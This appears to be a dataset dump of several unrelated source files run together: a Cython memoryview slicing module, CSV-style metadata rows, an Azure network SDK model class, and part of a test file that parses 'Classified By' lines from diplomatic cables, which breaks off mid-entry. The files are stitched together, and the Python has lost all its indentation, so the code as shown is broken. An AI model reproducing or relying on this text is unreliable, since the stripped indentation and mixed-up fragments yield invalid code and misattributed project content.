Slice a memoryviewslice.
indices - list of index nodes. If not a SliceNode, then it must be
coercible to Py_ssize_t
Simply call __pyx_memoryview_slice_memviewslice with the right
arguments.
"""
new_ndim = 0
src = self.cname
def load_slice_util(name, dict):
proto, impl = TempitaUtilityCode.load_as_string(
name, "MemoryView_C.c", context=dict)
return impl
all_dimensions_direct = True
for access, packing in self.type.axes:
if access != 'direct':
all_dimensions_direct = False
break
no_suboffset_dim = all_dimensions_direct and not have_slices
if not no_suboffset_dim:
suboffset_dim = code.funcstate.allocate_temp(
PyrexTypes.c_int_type, False)
code.putln("%s = -1;" % suboffset_dim)
code.putln("%(dst)s.data = %(src)s.data;" % locals())
code.putln("%(dst)s.memview = %(src)s.memview;" % locals())
code.put_incref_memoryviewslice(dst)
for dim, index in enumerate(indices):
error_goto = code.error_goto(index.pos)
if not isinstance(index, ExprNodes.SliceNode):
# normal index
idx = index.result()
access, packing = self.type.axes[dim]
if access == 'direct':
indirect = False
else:
indirect = True
generic = (access == 'full')
if new_ndim != 0:
return error(index.pos,
"All preceding dimensions must be "
"indexed and not sliced")
d = locals()
code.put(load_slice_util("SliceIndex", d))
else:
# slice, unspecified dimension, or part of ellipsis
d = locals()
for s in "start stop step".split():
idx = getattr(index, s)
have_idx = d['have_' + s] = not idx.is_none
if have_idx:
d[s] = idx.result()
else:
d[s] = "0"
if (not d['have_start'] and
not d['have_stop'] and
not d['have_step']):
# full slice (:), simply copy over the extent, stride
# and suboffset. Also update suboffset_dim if needed
access, packing = self.type.axes[dim]
d['access'] = access
code.put(load_slice_util("SimpleSlice", d))
else:
code.put(load_slice_util("ToughSlice", d))
new_ndim += 1
if not no_suboffset_dim:
code.funcstate.release_temp(suboffset_dim)
def empty_slice(pos):
none = ExprNodes.NoneNode(pos)
return ExprNodes.SliceNode(pos, start=none,
stop=none, step=none)
def unellipsify(indices, ndim):
result = []
seen_ellipsis = False
have_slices = False
for index in indices:
if isinstance(index, ExprNodes.EllipsisNode):
have_slices = True
full_slice = empty_slice(index.pos)
if seen_ellipsis:
result.append(full_slice)
else:
nslices = ndim - len(indices) + 1
result.extend([full_slice] * nslices)
seen_ellipsis = True
else:
have_slices = have_slices or isinstance(index, ExprNodes.SliceNode)
result.append(index)
if len(result) < ndim:
have_slices = True
nslices = ndim - len(result)
result.extend([empty_slice(indices[-1].pos)] * nslices)
return have_slices, result
def get_memoryview_flag(access, packing):
if access == 'full' and packing in ('strided', 'follow'):
return 'generic'
elif access == 'full' and packing == 'contig':
return 'generic_contiguous'
elif access == 'ptr' and packing in ('strided', 'follow'):
return 'indirect'
elif access == 'ptr' and packing == 'contig':
return 'indirect_contiguous'
elif access == 'direct' and packing in ('strided', 'follow'):
return 'strided'
else:
assert (access, packing) == ('direct', 'contig'), (access, packing)
return 'contiguous'
def get_is_contig_func_name(c_or_f, ndim):
return "__pyx_memviewslice_is_%s_contig%d" % (c_or_f, ndim)
def get_is_contig_utility(c_contig, ndim):
C = dict(context, ndim=ndim)
if c_contig:
utility = load_memview_c_utility("MemviewSliceIsCContig", C,
requires=[is_contig_utility])
else:
utility = load_memview_c_utility("MemviewSliceIsFContig", C,
requires=[is_contig_utility])
return utility
def copy_src_to_dst_cname():
return "__pyx_memoryview_copy_contents"
def verify_direct_dimensions(node):
for access, packing in node.type.axes:
if access != 'direct':
error(self.pos, "All dimensions must be direct")
def copy_broadcast_memview_src_to_dst(src, dst, code):
"""
Copy the contents of slice src to slice dst. Does not support indirect
slices.
"""
verify_direct_dimensions(src)
verify_direct_dimensions(dst)
code.putln(code.error_goto_if_neg(
"%s(%s, %s, %d, %d, %d)" % (copy_src_to_dst_cname(),
src.result(), dst.result(),
src.type.ndim, dst.type.ndim,
dst.type.dtype.is_pyobject),
dst.pos))
def get_1d_fill_scalar_func(type, code):
dtype = type.dtype
type_decl = dtype.declaration_code("")
dtype_name = mangle_dtype_name(dtype)
context = dict(dtype_name=dtype_name, type_decl=type_decl)
utility = load_memview_c_utility("FillStrided1DScalar", context)
code.globalstate.use_utility_code(utility)
return '__pyx_fill_slice_%s' % dtype_name
def assign_scalar(dst, scalar, code):
"""
Assign a scalar to a slice. dst must be a temp, scalar will be assigned
to a correct type and not just something assignable.
"""
verify_direct_dimensions(dst)
dtype = dst.type.dtype
type_decl = dtype.declaration_code("")
slice_decl = dst.type.declaration_code("")
code.begin_block()
code.putln("%s __pyx_temp_scalar = %s;" % (type_decl, scalar.result()))
if dst.result_in_temp() or (dst.base.is_name and
isinstance(dst.index, ExprNodes.EllipsisNode)):
dst_temp = dst.result()
else:
code.putln("%s __pyx_temp_slice = %s;" % (slice_decl, dst.result()))
dst_temp = "__pyx_temp_slice"
# with slice_iter(dst.type, dst_temp, dst.type.ndim, code) as p:
slice_iter_obj = slice_iter(dst.type, dst_temp, dst.type.ndim, code)
p = slice_iter_obj.start_loops()
if dtype.is_pyobject:
code.putln("Py_DECREF(*(PyObject **) %s);" % p)
code.putln("*((%s *) %s) = __pyx_temp_scalar;" % (type_decl, p))
if dtype.is_pyobject:
code.putln("Py_INCREF(__pyx_temp_scalar);")
slice_iter_obj.end_loops()
code.end_block()
def slice_iter(slice_type, slice_temp, ndim, code):
if slice_type.is_c_contig or slice_type.is_f_contig:
return ContigSliceIter(slice_type, slice_temp, ndim, code)
else:
return StridedSliceIter(slice_type, slice_temp, ndim, code)
class SliceIter(object):
def __init__(self, slice_type, slice_temp, ndim, code):
self.slice_type = slice_type
self.slice_temp = slice_temp
self.code = code
self.ndim = ndim
class ContigSliceIter(SliceIter):
def start_loops(self):
code = self.code
code.begin_block()
type_decl = self.slice_type.dtype.declaration_code("")
total_size = ' * '.join("%s.shape[%d]" % (self.slice_temp, i)
for i in range(self.ndim))
code.putln("Py_ssize_t __pyx_temp_extent = %s;" % total_size)
code.putln("Py_ssize_t __pyx_temp_idx;")
code.putln("%s *__pyx_temp_pointer = (%s *) %s.data;" % (
type_decl, type_decl, self.slice_temp))
code.putln("for (__pyx_temp_idx = 0; "
"__pyx_temp_idx < __pyx_temp_extent; "
"__pyx_temp_idx++) {")
return "__pyx_temp_pointer"
def end_loops(self):
self.code.putln("__pyx_temp_pointer += 1;")
self.code.putln("}")
self.code.end_block()
class StridedSliceIter(SliceIter):
def start_loops(self):
code = self.code
code.begin_block()
for i in range(self.ndim):
t = i, self.slice_temp, i
code.putln("Py_ssize_t __pyx_temp_extent_%d = %s.shape[%d];" % t)
code.putln("Py_ssize_t __pyx_temp_stride_%d = %s.strides[%d];" % t)
code.putln("char *__pyx_temp_pointer_%d;" % i)
code.putln("Py_ssize_t __pyx_temp_idx_%d;" % i)
code.putln("__pyx_temp_pointer_0 = %s.data;" % self.slice_temp)
for i in range(self.ndim):
if i > 0:
code.putln("__pyx_temp_pointer_%d = __pyx_temp_pointer_%d;" % (i, i - 1))
code.putln("for (__pyx_temp_idx_%d = 0; "
"__pyx_temp_idx_%d < __pyx_temp_extent_%d; "
"__pyx_temp_idx_%d++) {" % (i, i, i, i))
return "__pyx_temp_pointer_%d" % (self.ndim - 1)
def end_loops(self):
code = self.code
for i in range(self.ndim - 1, -1, -1):
code.putln("__pyx_temp_pointer_%d += __pyx_temp_stride_%d;" % (i, i))
code.putln("}")
code.end_block()
def copy_c_or_fortran_cname(memview):
if memview.is_c_contig:
c_or_f = 'c'
else:
c_or_f = 'f'
return "__pyx_memoryview_copy_slice_%s_%s" % (
memview.specialization_suffix(), c_or_f)
def get_copy_new_utility(pos, from_memview, to_memview):
if from_memview.dtype != to_memview.dtype:
return error(pos, "dtypes must be the same!")
if len(from_memview.axes) != len(to_memview.axes):
return error(pos, "number of dimensions must be same")
if not (to_memview.is_c_contig or to_memview.is_f_contig):
return error(pos, "to_memview must be c or f contiguous.")
for (access, packing) in from_memview.axes:
if access != 'direct':
return error(
pos, "cannot handle 'full' or 'ptr' access at this time.")
if to_memview.is_c_contig:
mode = 'c'
contig_flag = memview_c_contiguous
elif to_memview.is_f_contig:
mode = 'fortran'
contig_flag = memview_f_contiguous
return load_memview_c_utility(
"CopyContentsUtility",
context=dict(
context,
mode=mode,
dtype_decl=to_memview.dtype.declaration_code(''),
contig_flag=contig_flag,
ndim=to_memview.ndim,
func_cname=copy_c_or_fortran_cname(to_memview),
dtype_is_object=int(to_memview.dtype.is_pyobject)),
requires=[copy_contents_new_utility])
def get_axes_specs(env, axes):
'''
get_axes_specs(env, axes) -> list of (access, packing) specs for each axis.
access is one of 'full', 'ptr' or 'direct'
packing is one of 'contig', 'strided' or 'follow'
'''
cythonscope = env.global_scope().context.cython_scope
cythonscope.load_cythonscope()
viewscope = cythonscope.viewscope
access_specs = tuple([viewscope.lookup(name)
for name in ('full', 'direct', 'ptr')])
packing_specs = tuple([viewscope.lookup(name)
for name in ('contig', 'strided', 'follow')])
is_f_contig, is_c_contig = False, False
default_access, default_packing = 'direct', 'strided'
cf_access, cf_packing = default_access, 'follow'
axes_specs = []
# analyse all axes.
for idx, axis in enumerate(axes):
if not axis.start.is_none:
raise CompileError(axis.start.pos, START_ERR)
if not axis.stop.is_none:
raise CompileError(axis.stop.pos, STOP_ERR)
if axis.step.is_none:
axes_specs.append((default_access, default_packing))
elif isinstance(axis.step, IntNode):
# the packing for the ::1 axis is contiguous,
# all others are cf_packing.
if axis.step.compile_time_value(env) != 1:
raise CompileError(axis.step.pos, STEP_ERR)
axes_specs.append((cf_access, 'cfcontig'))
elif isinstance(axis.step, (NameNode, AttributeNode)):
entry = _get_resolved_spec(env, axis.step)
if entry.name in view_constant_to_access_packing:
axes_specs.append(view_constant_to_access_packing[entry.name])
else:
raise CompilerError(axis.step.pos, INVALID_ERR)
else:
raise CompileError(axis.step.pos, INVALID_ERR)
# First, find out if we have a ::1 somewhere
contig_dim = 0
is_contig = False
for idx, (access, packing) in enumerate(axes_specs):
if packing == 'cfcontig':
if is_contig:
raise CompileError(axis.step.pos, BOTH_CF_ERR)
contig_dim = idx
axes_specs[idx] = (access, 'contig')
is_contig = True
if is_contig:
# We have a ::1 somewhere, see if we're C or Fortran contiguous
if contig_dim == len(axes) - 1:
is_c_contig = True
else:
is_f_contig = True
if contig_dim and not axes_specs[contig_dim - 1][0] in ('full', 'ptr'):
raise CompileError(axes[contig_dim].pos,
"Fortran contiguous specifier must follow an indirect dimension")
if is_c_contig:
# Contiguous in the last dimension, find the last indirect dimension
contig_dim = -1
for idx, (access, packing) in enumerate(reversed(axes_specs)):
if access in ('ptr', 'full'):
contig_dim = len(axes) - idx - 1
# Replace 'strided' with 'follow' for any dimension following the last
# indirect dimension, the first dimension or the dimension following
# the ::1.
# int[::indirect, ::1, :, :]
# ^ ^
# int[::indirect, :, :, ::1]
# ^ ^
start = contig_dim + 1
stop = len(axes) - is_c_contig
for idx, (access, packing) in enumerate(axes_specs[start:stop]):
idx = contig_dim + 1 + idx
if access != 'direct':
raise CompileError(axes[idx].pos,
"Indirect dimension may not follow "
"Fortran contiguous dimension")
if packing == 'contig':
raise CompileError(axes[idx].pos,
"Dimension may not be contiguous")
axes_specs[idx] = (access, cf_packing)
if is_c_contig:
# For C contiguity, we need to fix the 'contig' dimension
# after the loop
a, p = axes_specs[-1]
axes_specs[-1] = a, 'contig'
validate_axes_specs([axis.start.pos for axis in axes],
axes_specs,
is_c_contig,
is_f_contig)
return axes_specs
def all(it):
for item in it:
if not item:
return False
return True
def is_cf_contig(specs):
is_c_contig = is_f_contig = False
if (len(specs) == 1 and specs == [('direct', 'contig')]):
is_c_contig = True
elif (specs[-1] == ('direct','contig') and
all([axis == ('direct','follow') for axis in specs[:-1]])):
# c_contiguous: 'follow', 'follow', ..., 'follow', 'contig'
is_c_contig = True
elif (len(specs) > 1 and
specs[0] == ('direct','contig') and
all([axis == ('direct','follow') for axis in specs[1:]])):
# f_contiguous: 'contig', 'follow', 'follow', ..., 'follow'
is_f_contig = True
return is_c_contig, is_f_contig
def get_mode(specs):
is_c_contig, is_f_contig = is_cf_contig(specs)
if is_c_contig:
return 'c'
elif is_f_contig:
return 'fortran'
for access, packing in specs:
if access in ('ptr', 'full'):
return 'full'
return 'strided'
view_constant_to_access_packing = {
'generic': ('full', 'strided'),
'strided': ('direct', 'strided'),
'indirect': ('ptr', 'strided'),
'generic_contiguous': ('full', 'contig'),
'contiguous': ('direct', 'contig'),
'indirect_contiguous': ('ptr', 'contig'),
}
def validate_axes_specs(positions, specs, is_c_contig, is_f_contig):
packing_specs = ('contig', 'strided', 'follow')
access_specs = ('direct', 'ptr', 'full')
# is_c_contig, is_f_contig = is_cf_contig(specs)
has_contig = has_follow = has_strided = has_generic_contig = False
last_indirect_dimension = -1
for idx, (access, packing) in enumerate(specs):
if access == 'ptr':
last_indirect_dimension = idx
for idx, pos, (access, packing) in zip(xrange(len(specs)), positions, specs):
if not (access in access_specs and
packing in packing_specs):
raise CompileError(pos, "Invalid axes specification.")
if packing == 'strided':
has_strided = True
elif packing == 'contig':
if has_contig:
raise CompileError(pos, "Only one direct contiguous "
"axis may be specified.")
valid_contig_dims = last_indirect_dimension + 1, len(specs) - 1
if idx not in valid_contig_dims and access != 'ptr':
if last_indirect_dimension + 1 != len(specs) - 1:
dims = "dimensions %d and %d" % valid_contig_dims
else:
dims = "dimension %d" % valid_contig_dims[0]
raise CompileError(pos, "Only %s may be contiguous and direct" % dims)
has_contig = access != 'ptr'
elif packing == 'follow':
if has_strided:
raise CompileError(pos, "A memoryview cannot have both follow and strided axis specifiers.")
if not (is_c_contig or is_f_contig):
raise CompileError(pos, "Invalid use of the follow specifier.")
if access in ('ptr', 'full'):
has_strided = False
def _get_resolved_spec(env, spec):
# spec must be a NameNode or an AttributeNode
if isinstance(spec, NameNode):
return _resolve_NameNode(env, spec)
elif isinstance(spec, AttributeNode):
return _resolve_AttributeNode(env, spec)
else:
raise CompileError(spec.pos, INVALID_ERR)
def _resolve_NameNode(env, node):
try:
resolved_name = env.lookup(node.name).name
except AttributeError:
raise CompileError(node.pos, INVALID_ERR)
viewscope = env.global_scope().context.cython_scope.viewscope
entry = viewscope.lookup(resolved_name)
if entry is None:
raise CompileError(node.pos, NOT_CIMPORTED_ERR)
return entry
def _resolve_AttributeNode(env, node):
path = []
while isinstance(node, AttributeNode):
path.insert(0, node.attribute)
node = node.obj
if isinstance(node, NameNode):
path.insert(0, node.name)
else:
raise CompileError(node.pos, EXPR_ERR)
modnames = path[:-1]
# must be at least 1 module name, o/w not an AttributeNode.
assert modnames
scope = env
for modname in modnames:
mod = scope.lookup(modname)
if not mod or not mod.as_module:
raise CompileError(
node.pos, "undeclared name not builtin: %s" % modname)
scope = mod.as_module
entry = scope.lookup(path[-1])
if not entry:
raise CompileError(node.pos, "No such attribute '%s'" % path[-1])
return entry
#
### Utility loading
#
def load_memview_cy_utility(util_code_name, context=None, **kwargs):
return CythonUtilityCode.load(util_code_name, "MemoryView.pyx",
context=context, **kwargs)
def load_memview_c_utility(util_code_name, context=None, **kwargs):
if context is None:
return UtilityCode.load(util_code_name, "MemoryView_C.c", **kwargs)
else:
return TempitaUtilityCode.load(util_code_name, "MemoryView_C.c",
context=context, **kwargs)
def use_cython_array_utility_code(env):
cython_scope = env.global_scope().context.cython_scope
cython_scope.load_cythonscope()
cython_scope.viewscope.lookup('array_cwrapper').used = True
context = {
'memview_struct_name': memview_objstruct_cname,
'max_dims': Options.buffer_max_dims,
'memviewslice_name': memviewslice_cname,
'memslice_init': memslice_entry_init,
}
memviewslice_declare_code = load_memview_c_utility(
"MemviewSliceStruct",
proto_block='utility_code_proto_before_types',
context=context)
atomic_utility = load_memview_c_utility("Atomics", context,
proto_block='utility_code_proto_before_types')
memviewslice_init_code = load_memview_c_utility(
"MemviewSliceInit",
context=dict(context, BUF_MAX_NDIMS=Options.buffer_max_dims),
requires=[memviewslice_declare_code,
Buffer.acquire_utility_code,
atomic_utility,
Buffer.typeinfo_compare_code],
)
memviewslice_index_helpers = load_memview_c_utility("MemviewSliceIndex")
typeinfo_to_format_code = load_memview_cy_utility(
"BufferFormatFromTypeInfo", requires=[Buffer._typeinfo_to_format_code])
is_contig_utility = load_memview_c_utility("MemviewSliceIsContig", context)
overlapping_utility = load_memview_c_utility("OverlappingSlices", context)
copy_contents_new_utility = load_memview_c_utility(
"MemviewSliceCopyTemplate",
context,
requires=[], # require cython_array_utility_code
)
view_utility_code = load_memview_cy_utility(
"View.MemoryView",
context=context,
requires=[Buffer.GetAndReleaseBufferUtilityCode(),
Buffer.buffer_struct_declare_code,
Buffer.empty_bufstruct_utility,
memviewslice_init_code,
is_contig_utility,
overlapping_utility,
copy_contents_new_utility,
ModuleNode.capsule_utility_code],
)
view_utility_whitelist = ('array', 'memoryview', 'array_cwrapper',
'generic', 'strided', 'indirect', 'contiguous',
'indirect_contiguous')
copy_contents_new_utility.requires.append(view_utility_code)
|
apache-2.0
| 9,080,627,596,111,706,000
| 34.598501
| 108
| 0.573749
| false
| 3.617845
| false
| false
| false
|
lmazuel/azure-sdk-for-python
|
azure-mgmt-network/azure/mgmt/network/v2017_03_01/models/topology_association.py
|
1
|
1586
|
# coding=utf-8
# --------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for
# license information.
#
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is
# regenerated.
# --------------------------------------------------------------------------
from msrest.serialization import Model
class TopologyAssociation(Model):
"""Resources that have an association with the parent resource.
:param name: The name of the resource that is associated with the parent
resource.
:type name: str
:param resource_id: The ID of the resource that is associated with the
parent resource.
:type resource_id: str
:param association_type: The association type of the child resource to the
parent resource. Possible values include: 'Associated', 'Contains'
:type association_type: str or
~azure.mgmt.network.v2017_03_01.models.AssociationType
"""
_attribute_map = {
'name': {'key': 'name', 'type': 'str'},
'resource_id': {'key': 'resourceId', 'type': 'str'},
'association_type': {'key': 'associationType', 'type': 'str'},
}
def __init__(self, **kwargs):
super(TopologyAssociation, self).__init__(**kwargs)
self.name = kwargs.get('name', None)
self.resource_id = kwargs.get('resource_id', None)
self.association_type = kwargs.get('association_type', None)
|
mit
| -3,703,639,473,381,361,700
| 38.65
| 78
| 0.612863
| false
| 4.405556
| false
| false
| false
|
heuer/cablemap
|
cablemap.core/tests/test_reader_classified_by.py
|
1
|
39464
|
# -*- coding: utf-8 -*-
#
# Copyright (c) 2011 - 2015 -- Lars Heuer <heuer[at]semagia.com>
# All rights reserved.
#
# License: BSD, see LICENSE.txt for more details.
#
"""\
Tests classificationist parsing.
:author: Lars Heuer (heuer[at]semagia.com)
:organization: Semagia - <http://www.semagia.com/>
:license: BSD license
"""
from nose.tools import eq_, ok_
from cablemap.core import cable_by_id
from cablemap.core.reader import parse_classified_by
_TEST_DATA = (
(u'10TOKYO397', u'Marc Wall', u'''FIELD
REF: STATE 015541
Classified By: Acting Deputy Chief of Mission Marc Wall for Reasons 1.4
(b) and (d)
¶1. (C) SUM'''),
(u'10GENEVA249', u'Rose E. Gottemoeller', u'''REF: 10 GENEVA 231 (SFO-GVA-VIII-088) CLASSIFIED BY: Rose E. Gottemoeller, Assistant Secretary, Department of State, VCI; REASON: 1.4(B), (D) '''),
(u'10GENEVA247', u'Rose E. Gottemoeller', u'''REF: 10 GENEVA 245 (SFO-GVA-VIII-086) CLASSIFIED BY: Rose E. Gottemoeller, Assistant Secretary, Department of State, VCI; REASON: 1.4(B), (D) ¶1. (U) This '''),
(u'10UNVIEVIENNA77', u'Glyn T. Davies', u'''\nClassified By: Ambassador Glyn T. Davies for reasons 1.4 b and d '''),
(u'10WARSAW117', u'F. Daniel Sainz', u'''\nClassified By: Political Counselor F. Daniel Sainz for Reasons 1.4 (b) and (d) '''),
(u'10STATE16019', u'Karin L. Look', u'''\nClassified By: Karin L. Look, Acting ASSISTANT SECRETARY, VCI. Reason: 1.4 (b) and (d).'''),
(u'10LILONGWE59', u'Bodde Peter', u'''\nCLASSIFIED BY: Bodde Peter, Ambassador; REASON: 1.4(B) '''),
(u'95ZAGREB4339', u'ROBERT P. FINN', u'''
1. (U) CLASSIFIED BY ROBERT P. FINN, DEPUTY CHIEF OF
MISSION. REASON: 1.5 (D)
'''),
(u'95DAMASCUS5748', u'CHRISTOPHER W.S. ROSS', u'''SUBJECT: HAFIZ AL-ASAD: LAST DEFENDER OF ARABS
1. CONFIDENTIAL - ENTIRE TEXT. CLASSIFIED BY:
CHRISTOPHER W.S. ROSS, AMBASSADOR. REASON: 1.5 (D) .
2. SUMMAR'''),
(u'95TELAVIV17504', (), u'''
1. CONFIDENTIAL - ENTIRE TEXT. CLASSIFIED BY SECTION 1.5 (B)
AND (D). NIACT PRECEDENCE BECAUSE OF GOVERNMENT CRISIS IN
ISRAEL.
2. SU'''),
(u'95RIYADH5221', u'THEODORE KATTOUF', u'''
1. CONFIDENTIAL - ENTIRE TEXT. CLASSIFIED BY DCM
THEODORE KATTOUF - 1.5 B,D.
2. (C)'''),
(u'96ADDISABABA1545', u'JEFFREY JACOBS', u'''
1. (U) CLASSIFIED BY POLOFF JEFFREY JACOBS, 1.5 (D).
2. (C)'''),
(u'96AMMAN2094', u'ROBERT BEECROFT', u'''
1. (U) CLASSIFIED BY CHARGE ROBERT BEECROFT; REASON 1.5 (D).
2. (C) '''),
(u'96STATE86789', u'MARY BETH LEONARD', u'''
1. CLASSIFIED BY AF/C - MARY BETH LEONARD, REASON 1.5
(D). '''),
(u'96NAIROBI6573', u'TIMOTHY CARNEY', u'''
1. CLASSIFIED BY AMBASSADOR TO SUDAN TIMOTHY CARNEY.
REASON 1.5(D).
'''),
(u'96RIYADH2406', u'THEODORE KATTOUF', u'''SUBJECT: CROWN PRINCE ABDULLAH THE DIPLOMAT
1. (U) CLASSIFIED BY CDA THEODORE KATTOUF, REASON 1.5.D.
2. '''),
(u'96RIYADH2696', u'THEODORE KATTOUF', u'''
1. (U) CLASSIFIED BY CHARGE D'AFFAIRES THEODORE
KATTOUF: 1.5 B, D.
'''),
(u'96ISLAMABAD5972', u'THOMAS W. SIMONS, JR.', u'''
1. (U) CLASSIFIED BY THOMAS W. SIMONS, JR., AMBASSADOR.
REASON: 1.5 (B), (C) AND (D).
'''),
(u'96ISLAMABAD5972', u'Thomas W. Simons, Jr.', u'''
1. (U) CLASSIFIED BY THOMAS W. SIMONS, JR., AMBASSADOR.
REASON: 1.5 (B), (C) AND (D).
''', True),
(u'96STATE183372', u'LEE 0. COLDREN', u'''
1. (U) CLASSIFIED BY LEE 0. COLDREN, DIRECTOR, SA/PAB,
DEPARTMENT OF STATE. REASON: 1.5(D).
'''),
(u'96STATE183372', u'Lee O. Coldren', u'''
1. (U) CLASSIFIED BY LEE 0. COLDREN, DIRECTOR, SA/PAB,
DEPARTMENT OF STATE. REASON: 1.5(D).
''', True),
(u'96ASHGABAT2612', u'TATIANA C. GFOELLER', u'''
1. (U) CLASSIFIED BY CHARGE TATIANA C. GFOELLER.
REASON: 1.5 D.
'''),
(u'96BOGOTA8773', u'S.K. ABEYTA', u'''
1. CLASSIFIED BY POL/ECONOFF. S.K. ABEYTA. REASON: 1.5(D)
'''),
(u'96STATE194868', u'E. GIBSON LANPHER, JR.', u'''
1. (U) CLASSIFIED BY E. GIBSON LANPHER, JR., ACTING
ASSISTANT SECRETARY OF STATE FOR SOUTH ASIAN AFFAIRS,
DEPARTMENT OF STATE. REASON: 1.5(D).
'''),
(u'96JAKARTA7841', u'ED MCWILLIAMS', u'''
1. (U) CLASSIFIED BY POL COUNSELOR ED MCWILLIAMS;
REASON 1.5(D)
'''),
(u'96JERUSALEM3094', u'EDWARD G. ABINGTON, JR.', u'''
1. CLASSIFIED BY CONSUL GENERAL EDWARD G. ABINGTON, JR. REASON
1.5 (B) AND (D).
'''),
(u'96BOGOTA10967', u'S.K. ABEYTA', u'''
1. (U) CLASSIFIED BY POL/ECONOFF S.K. ABEYTA. REASON 1.5(D).
'''),
(u'04MUSCAT2112', u'Richard L. Baltimore, III', u'''
Classified By: Ambassador Richard L. Baltimore, III.
Reasons: 1.4 (b) and (d).
'''),
(u'04MUSCAT2112', u'Richard L. Baltimore, III', u'''
Classified By: Ambassador Richard L. Baltimore, III.
Reasons: 1.4 (b) and (d).
''', True),
(u'05OTTAWA1975', u'Patricia Kim-Scott', u'''
Classified By: Pol/Mil Officer Patricia Kim-Scott. Reason E.O. 12958,
1.4 (b) and (d).
'''),
(u'05BOGOTA6208', u'William B. Wood', u'''
Classified By: Ambassador William B. Wood; reasons 1.4
(b) and (d)
'''),
(u'05TAIPEI2839', u'Douglas Paal', u'''
Classified By: AIT Director Douglas Paal, Reason(s): 1.4 (B/D).
'''),
(u'05DHAKA3073', u'D.C. McCullough', u'''
Classified By: A/DCM D.C. McCullough, reason para 1.4 (b)
'''),
(u'09NAIROBI1132', u'Jessica Davis Ba', u'''
Classified By: Pol/Econ Officer Jessica Davis Ba for reasons 1.4(b) and
(d)
'''),
(u'08ROME1541', u'Liz Dibble', u'''
Classified By: Classified by DCM Liz Dibble for reasons 1.4 (b) and
(d).
'''),
(u'06BAGHDAD2082', u'DANIEL SPECKHARD', ur'''
Classified By: CHARGE D\'AFFAIRES DANIEL SPECKHARD FOR REASONS 1.4 (A),
(B) AND (D)
'''),
(u'05ANKARA4653', u'Nancy McEldowney', u'''
Classified By: (U) CDA Nancy McEldowney; E.O. 12958, reasons 1.4 (b,d)
'''),
(u'05QUITO2057', u'LARRY L. MEMMOTT', u'''
Classified By: ECON LARRY L. MEMMOTT, REASONS 1.4 (B,D)
'''),
(u'06HONGKONG3559', u'LAURENT CHARBONNET', u'''
CLASSIFIED BY: ACTING DEPUTY PRINCIPAL OFFICER LAURENT CHARBONNET. REA
SONS: 1.4 (B,D)
'''),
(u'09BAGHDAD791', u'Patricia Butenis', u'''
Classified By: Charge d\' Affairs Patricia Butenis for reasons 1.4 (b) a
nd (d)
'''),
(u'06OSLO19', u'Christopher W. Webster', u'''
Classified By: Charge d\'Affaires a.i. Christopher W. Webster,
reason 1.4 (b) and (d)
'''),
(u'08BEIJING3386', u'Aubrey Carlson', u'''
Classified By: Political Section Minister Counselor Aubrey Carlson. Re
asons 1.4 (b/d).
'''),
(u'09MOSCOW2393', u'Susan M. Elliott', u'''
Classified By: Political Minister Counselor Susan M. Elliott for reason
s: 1.4 (b), (d).
'''),
(u'10BRUSSELS66', u'Christopher R. Davis', u'''
Classified By: Political Minister-Counselor Christopher R. Davis for re
ason 1.4 (b/d)
'''),
(u'06BEIJING22125', u'ROBERT LUKE', u'''
Classified By: (C) CLASSIFIED BY MINISTER COUNSELOR FOR ECONOMIC AFFAIR
S ROBERT LUKE; REASON 1.4 (B) AND (D).
'''),
(u'07CAIRO622', u'William R. Stewart', u'''
Classified by: Minister Counselor for Economic and
Political Affairs William R. Stewart for reasons 1.4(b) and
(d).
'''),
(u'07BAGHDAD1188', u'Daniel Speckhard', u'''
Classified By: Charge Affaires Daniel Speckhard. Reasons: 1.4 (b) and
(d).
'''),
(u'08PARIS1131', u'STUART DWYER', u'''
Classified By: ECONCOUNS STUART DWYER FOR REASONS 1.4 B AND D
'''),
(u'08ATHENS985', u'Jeff Hovenier', u'''
Classified By: A/Political Counselor Jeff Hovenier for
1.4 (b) and (d)
'''),
(u'09BEIJING2690', u'William Weinstein', u'''
Classified By: This message classified by Econ Minister Counselor
William Weinstein for reasons 1.4 (b), (d) and (e).
'''),
(u'06VILNIUS945', u'Rebecca Dunham', u'''
Classified By: Political and Economic Section Chief Rebecca Dunham for
reasons 1.4 (b) and (d)
'''),
(u'07BAGHDAD2781', u'Howard Keegan', u'''
Classified By: Kirkuk PRT Team Leader Howard Keegan for reason 1.4 (b)
and(d).
'''),
(u'09HARARE864', u'Donald Petterson', u'''
Classified By: Charge d\'affaires, a.i. Donald Petterson for reason 1.4
(b).
'''),
(u'04MANAMA525', u'Robert S. Ford', u'''
Classified By: Charge de Affaires Robert S. Ford for reasons
1.4 (b) and (d).
'''),
(u'08STATE56778', u'Patricia A. McNerney', u'''
Classified By: ISN Acting Assistant Secretary
Patricia A. McNerney, Reasons 1.4 b, c, and d
'''),
(u'07BRUSSELS1462', u'Larry Wohlers', u'''
Classified By: USEU Political Minister Counselor Larry Wohlers
for reasons 1.4 (b) and (d).
'''),
(u'09KABUL2261', u'Hoyt Yee', u'''
Classified By: Interagency Provincial Affairs Deputy Coordinator Hoyt Y
ee for reasons 1.4 (b) and (d)
'''),
(u'09KABUL1233', u'Patricia A McNerney', u'''
Classified By: PRT and Sub-National Governance Acting Director Patricia
A McNerney for reasons 1.4 (b) and (d)
'''),
(u'09BRUSSELS1288', u'CHRISTOPHER DAVIS', u'''
Classified By: CLASSIFIED BY USEU MCOUNSELOR CHRISTOPHER DAVIS, FOR REA
SONS 1.4 (B) AND (D)
'''),
(u'06TAIPEI3165', u'Stephen M. Young', u'''
Classified By: Classified by AIT DIR Stephen M. Young.
Reasons: 1.4 b, d.
'''),
(u'07BRUSSELS1208', u'Courtney Nemroff', u'''
Classified By: Institutional Affairs Unit Chief Courtney Nemroff for re
asons 1.4 (b) & (d)
'''),
(u'05CAIRO8602', u'Michael Corbin', u'''
Classified by ECPO Minister-Counselour Michael Corbin for
reasons 1.4 (b) and (d).
'''),
(u'09MADRID1210', u'Arnold A. Chacon', u'''
Classified By: Charge d'Affaires, a.i., Arnold A. Chacon
1.(C) Summary: In his meetings with Spanish officials,
Special Envoy for Eurasian Energy'''),
(u'05SINGAPORE887', u'Laurent Charbonnet', u'''
Classified By: E/P Counselor Laurent Charbonnet, Reasons 1.4(b)(d)
'''),
(u'09SINGAPORE677', u'Dan Jassem', u'''
Classified By: Acting E/P Counselor Dan Jassem for reasons 1.4 (b) and
(d)
'''),
(u'08BELGRADE1189', u'Thatcher Scharpf', u'''
